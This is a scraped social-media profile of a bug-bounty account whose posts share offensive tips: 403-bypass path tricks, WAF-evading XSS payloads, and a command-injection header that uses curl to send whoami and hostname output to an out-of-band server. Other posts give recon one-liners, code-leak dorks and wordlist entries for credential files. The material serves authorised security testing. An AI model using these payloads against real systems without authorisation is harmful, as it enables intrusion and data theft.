RootMoksha Profile Banner
RootMoksha Labs Profile
RootMoksha Labs

@RootMoksha

Followers
7K
Following
43
Media
639
Statuses
1K

Cybersecurity focussed Bitcoin venture studio

Joined November 2023
Don't wanna be here? Send us removal request.
@RootMoksha
RootMoksha Labs
11 months
IDOR Checklist by @wtf_brut #BugBounty #bugbountytips
0
12
58
@RootMoksha
RootMoksha Labs
11 months
403 bypass methodology ! 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ #bugbountytips by @viehgroup
0
52
246
@RootMoksha
RootMoksha Labs
11 months
403 Bypass Payloads by @wtf_brut #bugbountytips #BugBounty
1
31
155
@RootMoksha
RootMoksha Labs
1 year
Use Uncover for recon purposes uncover -q http.title:"GitLab" -silent | httpx -silent | nuclei uncover -q target -f ip | naabu echo jira | uncover -e shodan,censys -silent #bugbountytips by:@infoscresearchr #BugBounty
0
1
15
@RootMoksha
RootMoksha Labs
1 year
Do wayback on root domain then get endpoints and add it to your list and fuzz on subdomains or other roots.. $ ~ waybackurls https://t.co/GG8FK8E2OW |cut -d "/" -f 4-|sort -u > endpoints.txt #bugbountytips by @111xNagashy #BugBounty
1
28
182
@RootMoksha
RootMoksha Labs
1 year
Add the file `wp-config.php.txt` to your wordlist, and you might discover some juicy data. #bugbountytips by @NoRed0x #BugBounty
1
15
84
@RootMoksha
RootMoksha Labs
1 year
"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #bugbountytips by @0x0SojalSec #BugBounty
1
32
198
@RootMoksha
RootMoksha Labs
1 year
Subdomain Enumeration Using Web Archive This Bash function extracts subdomains from Web Archive results! Add it to your ~/.bashrc: function wayback() { curl -sk " https://t.co/ysg7p6fq4Q…" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u } By: @Sp1x0r #BugBountyTips
0
9
37
@RootMoksha
RootMoksha Labs
1 year
If you come across a Windows IIS server, definitely scan the shortname and try to obtain the files by fuzzing, this may allow you to find vulnerabilities like 'CVE-2024-39677: NHibernate SQL Injection Vulnerability ' By:@ynsmroztas #BugBounty #bugbountytips
1
37
189
@RootMoksha
RootMoksha Labs
1 year
an XSS payload to bypass some waf & filters in Firefox <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"> Credits:@0x0SojalSec #bugbounty #bugbountytips
1
40
187
@RootMoksha
RootMoksha Labs
1 year
RCE - Can we still use this in HTTP Header? ` ' ; $ > curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server By:@gudetama_bf #bugbountytips #BugBounty
0
2
14
@RootMoksha
RootMoksha Labs
1 year
Add the file `yahoo_site_admin/credentials/db.conf` to your wordlist, and you might discover some juicy data. Credits:@NoRed0x #BugBounty #bugbountytips
0
2
7
@RootMoksha
RootMoksha Labs
1 year
0
10
27
@RootMoksha
RootMoksha Labs
1 year
Google Dorks - Code Leaks site:pastebin. com "example. com" site:jsfiddle. net "example. com" site:codebeautify. org "example. com" site:codepen. io "example. com" Credits: @TakSec #BugBounty #bugbountytips
1
22
116
@RootMoksha
RootMoksha Labs
1 year
Subdomain Takeover Detection with Subfinder & Nuclei -new wordpress takeover detection for nuclei template subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target https://t.co/xX8JrKEQoT Credits: @TheMsterDoctor1 #BugBounty #bugbountytips
0
57
190
@RootMoksha
RootMoksha Labs
1 year
Nuclei Template : REFLECTION Potential XSS, SSRF, Cache Poisoning, Open URL Redirection & OAUTH Redirection nuclei -t reflection[.]yaml -u target Credit: @gudetama_bf #BugBounty #bugbountytips
0
21
57
@RootMoksha
RootMoksha Labs
1 year
Wordlist for fuzzing hidden database files https://t.co/a9xp6hvwE0 Credits: @KonwarAbhi98099 #BugBounty #bugbountytips
0
64
215
@RootMoksha
RootMoksha Labs
1 year
Google Dork Hunt for XSS, SQLi, API vulnerabilities & hidden endpoints python dork[.]py -d "site:*target filetype:php" Credit: @gudetama_bf #bugbountytips #BugBounty
1
39
153